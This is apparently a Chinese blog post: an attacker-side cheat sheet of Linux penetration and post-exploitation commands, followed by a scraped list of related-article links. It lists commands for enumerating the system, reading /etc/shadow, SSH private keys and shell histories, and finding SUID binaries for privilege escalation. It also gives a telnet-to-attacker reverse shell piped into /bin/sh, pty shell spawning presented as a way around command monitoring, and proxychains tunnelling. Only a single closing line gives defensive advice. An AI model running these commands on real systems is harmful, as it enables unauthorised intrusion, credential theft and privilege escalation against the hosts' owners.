linux中常见渗透命令
linux中常见渗透命令
操作系统信息收集
如何查看服务器的版本?
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release # 基于 Debian
cat /etc/redhat-release # 基于 Redhat
如何查看内核的版本信息?
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
环境变量里的信息如何查看?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set
是否有打印机?
lpstat -a
应用和服务信息
有什么服务在运行?是以什么样的权限在运行?
ps aux
ps -ef
top
cat /etc/services
关注一下以 root 权限运行的服务,有可能对我们提权有帮助。
ps aux | grep rootps -ef | grep root
安装了哪些应用?版本是啥?当前是否在运行?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/
常见的配置文件有哪些?有没有可被攻击的插件安装?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.r./
有什么工作任务计划?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
如何查找系统内跟用户名和密码相关的文件?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 “password” [filename]
find . -name “*.php” -print0 | xargs -0 grep -i -n “var $password” #
Joomla
网络通讯相关
系统内是否存在NIC?是否连接这其他网络?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
网络配置信息在哪?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname
与哪些主机在通讯?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w
有哪些关于 IP 和 MAC 地址的缓存?
arp -e
route
/sbin/route -nee
如何抓取流量?怎么看?
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21
注意:tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
如何得到一个 shell 连接?你可以与系统交互吗?
nc -lvp 4444 # 在攻击者的 PC 上执行
nc -lvp 4445 # 在受害者的 PC 上执行
telnet [atackers ip] 4444 | /bin/sh | telnet [local ip] 4445 # 在受害者的
PC 上执行
其他姿势参见:linux下反弹shell的姿势
如何进行端口转发?
参考文章:穿越边界的姿势
其他姿势请自行探索
如何使用隧道执行命令?
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig
跟用户相关的信息
我是谁?谁登入了?谁登入过?等
id
who
w
last
cat /etc/passwd | cut -d: -f1 # 列出用户
grep -v -E “^#” /etc/passwd | awk -F: ‘$3 == 0 { print $1}’ # 列出超级用户
awk -F: ‘($3 == “0”) {print}’ /etc/passwd # 列出超级用户
cat /etc/sudoers
sudo -l
有哪些敏感文件?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
根目录如果可以访问,有哪些有趣的东西?
ls -ahlR /root/
ls -ahlR /home/
可能存在密码的文件?
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
用户做了什么?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
有关用户的信息在哪?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root
私钥在什么地方?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
文件系统
/etc/ 下有哪些文件可写,哪些服务可以被重新配置?
ls -aRl /etc/ | awk ‘$1 ~ /^.w./’ 2>/dev/null # Anyone
ls -aRl /etc/ | awk ‘$1 ~ /^…w/’ 2>/dev/null # Owner
ls -aRl /etc/ | awk ‘$1 ~ /^…w/’ 2>/dev/null # Group
ls -aRl /etc/ | awk ‘/’ 2>/dev/null # Other
find /etc/ -readable -type f 2>/dev/null # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone
在 /var/ 下我们能发现什么?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases
在网站的目录下有没有隐藏文件?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/
有哪些日志文件?
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
值得注意的: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
如果命令执行被监视怎么办?
python -c ‘import pty;pty.spawn("/bin/bash")’
echo os.system(’/bin/bash’)
/bin/sh -i
文件系统如何安装?
mount
df -h
是否有未安装的文件系统?
cat /etc/fstab
有哪些 “ 高级的 Linux 文件权限 ” 在使用?
find / -perm -1000 -type d 2>/dev/null # Sticky bit -
只有目录的所有者或文件的所有者才能删除或重命名。find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) -
作为组运行,而不是启动它的用户。find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) -
作为所有者运行,而不是启动它的用户。find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in locate -r “bin$”; do find $i ( -perm -4000 -o -perm -2000 )
-type f 2>/dev/null; done # 查找常见位置中用于 SGID 或 SUID 的文件find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {}
; 2>/dev/null # 从根开始查找所有的 SUID 不包括符号链接,并且只搜索三层
如何查找可写可执行的目录?
find / -writable -type d 2>/dev/null # 可写目录
find / -perm -222 -type d 2>/dev/null # 可写目录
find / -perm -o w -type d 2>/dev/null # 可写目录
find / -perm -o x -type d 2>/dev/null # 可执行目录
find / ( -perm -o w -perm -o x ) -type d 2>/dev/null
如何查找可能存在问题的文件?
find / -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -print # 可写的文件
find /dir -xdev ( -nouser -o -nogroup ) -print # 没有归属的文件
寻找可利用的漏洞
安装支持哪些工具和语言?
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc
能够用于上传的软件有那些?
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp
查找 exploit 的网站?
http://www.exploit-db.com
http://1337day.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com
有关漏洞的更多信息?
http://www.cvedetails.com
http://packetstormsecurity.org/files/cve/[CVE]
http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
http://www.vulnview.com/cve-details.php?cvename=[CVE]
应急措施
针对以上提到的所有命令,执行收集一下信息,看能否找到可以利用的点,然后针对可利用的点进行升级或者使用一些安全产品来做防护,使用如下命令进行升级:
apt-get update && apt-get upgradeyum update
linux中常见渗透命令相关推荐
- Linux中常见shell命令总结
1.具体的shell命令用法可以通过help或man命令进入手册来查询其具体的用法. 2.终端本质上对应着linux上的/dev/tty设备,linux的多用户登录就是通过不同的/dev/tty设备完 ...
- linux中find命令列举,Linux中常见find命令的使用
Linux下find命令在目录结构中搜索文件,并执行指定的操作.Linux下find命令提供了相当多的查找文件,功能很强大.由于find具有强大的功能,所以它的选项也很多,需要我们花时间来了解. 命令 ...
- gnu linux 使用find,Linux中常见find命令的使用
Linux下find命令在目录结构中搜索文件,并执行指定的操作.Linux下find命令提供了相当多的查找文件,功能很强大.由于find具有强大的功能,所以它的选项也很多,需要我们花时间来了解. 命令 ...
- Linux中常见命令和单词的缩写全称
Linux中常见命令和单词的缩写全称 文章目录: 参考 ls:list(列出目录内容)cd:Change Directory(改变目录) su:switch user 切换用户 rpm:redhat ...
- linux 中常见的压缩和解压缩的命令
# linux 中常见的压缩和解压缩的命令 一.tar 1.解压: tar zxvf filename.tar 2.压缩: tar czvf filename.tar dirname 二.gz 1.解 ...
- linux一条命令添加用户并设置密码,linux中如何通过命令行来添加用户并设置密码...
linux中如何通过命令行来添加用户并设置密码 (7页) 本资源提供全文预览,点击全文预览即可全文预览,如果喜欢文档就下载吧,查找使用更方便哦! 14.90 积分 LINUX中如何通过命令行来添加用户 ...
- linux系统export,Linux入门进阶 - 如何在Linux中使用export命令
原标题:Linux入门进阶 - 如何在Linux中使用export命令 来自: Linux迷 链接:https://www.linuxmi.com/linux-export.html Linux ex ...
- php umount强制,linux中mount/umount命令的基本用法及开机自动挂载方法
本文介绍了linux中mount/umount命令的基本用法及开机自动挂载,具体方法如下: mount命令格式如下: 格式:mount [-参数] [设备名称] [挂载点] 其中常用的参数有: -a ...
- linux tr 命令_在Linux中使用tr命令玩角色
linux tr 命令 tr command in Linux translates one set of characters to another. It can replace a charac ...
最新文章
- Chrome——我的Chrome插件
- ansible roles角色(模块化)详解
- Django04: ORM配置与使用MySQL数据库
- P5039 [SHOI2010]最小生成树(网络流)
- Drools 6.5.0.Final提供
- 我想说:工作没那么难找吧
- poj 2417 Discrete Logging
- Java 程序员中位数薪资达 1.45 万,但面试屡屡被拒?
- 北大主场夺金ACM-ICPC全球总决赛,总教练罗国杰分享背后“秘笈”
- 企业云成本浪费高达30%!行云管家、Cloudyn等厂商给出解决方案...
- 零基础python数据分析自学_零基础的人,怎么自学数据分析?
- java 需要返回类型_在Java中,当一个方法不需要返回数据时返回类型必须是
- HDU 6603 Azshara's deep sea(凸包+区间DP)
- 高速PCB设计中遇到的问题总结
- 加深 | Matlab图像实验操作基础(矩阵,九宫格、噪声处理)
- 今年护网蓝队防御具体实施方案
- linux开机故障,Entering emeryency mode. Exit the shell to continue.
- CPU温度过高解决方法
- 论学习和工作的最大区别
- SaaS模式、技术与案例详解——第12章 数据存储
热门文章
- 小数加分数怎样计算讲解_小学数学整数、小数、分数加减法运算法则及练习(可打印)...
- 浏览器触发reflow(回流)的操作
- 滴滴打车And 360 校招 2016 在线笔试(一)
- 全球同服--coc类游戏服务器架构
- Android时光轴
- 011.socket函数错误封装处理
- WebService安装中的典型错误(0x8007000d)-WIN7操作系统64位
- 怎么通过新闻软文推广打造爆点
- 零基础入门深度学习(5) - 循环神经网络【转】
- exfat linux 编译,嵌入式 linux 基于fuse 的 exfat 文件系统实现